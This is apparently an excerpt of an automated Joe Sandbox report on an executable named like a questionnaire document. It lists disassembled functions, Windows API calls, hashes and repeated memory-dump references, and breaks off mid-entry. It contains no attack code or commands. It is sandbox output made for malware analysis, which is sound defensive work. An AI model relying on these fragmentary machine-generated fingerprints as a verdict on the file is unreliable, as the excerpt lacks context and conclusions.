                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$CurrentThread
                                                                                              • String ID:
                                                                                              • API String ID: 3968769311-0
                                                                                              • Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                                                              • Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
                                                                                              • Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                                                              • Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PeekMessageW.USER32 ref: 005B8604
                                                                                              • IsWindowUnicode.USER32 ref: 005B8618
                                                                                              • PeekMessageW.USER32 ref: 005B863B
                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                                                              • TranslateMessage.USER32 ref: 005B86D6
                                                                                              • DispatchMessageW.USER32 ref: 005B86E3
                                                                                              • DispatchMessageA.USER32 ref: 005B86EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2190272339-0
                                                                                              • Opcode ID: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                                                              • Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
                                                                                              • Opcode Fuzzy Hash: 0c3374f57e659fab6af93a213fc217c082f6b8d0dd5b2fa1f367d4961ec17b25
                                                                                              • Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006A5F04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                                                              • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandle$AttributesCloseCreateModule
                                                                                              • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                                                              • API String ID: 791737717-340263132
                                                                                              • Opcode ID: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                                                              • Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
                                                                                              • Opcode Fuzzy Hash: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                                                              • Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                                                              • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressErrorHandleLastModuleProc
                                                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                                              • API String ID: 4275029093-79381301
                                                                                              • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                                              • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                                                              • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                                              • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005CE26C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 005CE27D
                                                                                                • Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280
                                                                                              • SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                                                              • GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                                                              • GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                                                              • ReleaseDC.USER32 ref: 005CE2F2
                                                                                              Strings
                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                              • API String ID: 1334710084-222967699
                                                                                              • Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                                                              • Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
                                                                                              • Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                                                              • Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B8141, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                                                                • Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                                                              • SetForegroundWindow.USER32(?), ref: 006B817A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                              • String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
                                                                                              • API String ID: 3179053593-36556386
                                                                                              • Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                                                              • Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
                                                                                              • Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                                                              • Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite
                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                              • API String ID: 3320372497-2970929446
                                                                                              • Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                                                              • Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
                                                                                              • Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                                                              • Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0043171C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 004318F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 351091851-0
                                                                                              • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                              • Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
                                                                                              • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                              • Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006AE6F8, Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006AE714
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006AE758
                                                                                              • SetWindowLongW.USER32 ref: 006AE77F
                                                                                              • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$Show
                                                                                              • String ID:
                                                                                              • API String ID: 3609083571-0
                                                                                              • Opcode ID: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
                                                                                              • Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
                                                                                              • Opcode Fuzzy Hash: cbd293cfec67b64efc79bc9d205490811c8f395d7711b658bf93e82dc89e2f59
                                                                                              • Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060D3B4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateFileHandle
                                                                                              • String ID: .tmp$Gtk$_iu
                                                                                              • API String ID: 3498533004-1320520068
                                                                                              • Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                                                              • Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
                                                                                              • Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                                                              • Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006B8998, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                              • ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE
                                                                                                • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                                                • Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                                                                • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                                                              Strings
                                                                                              Memory Dump Source
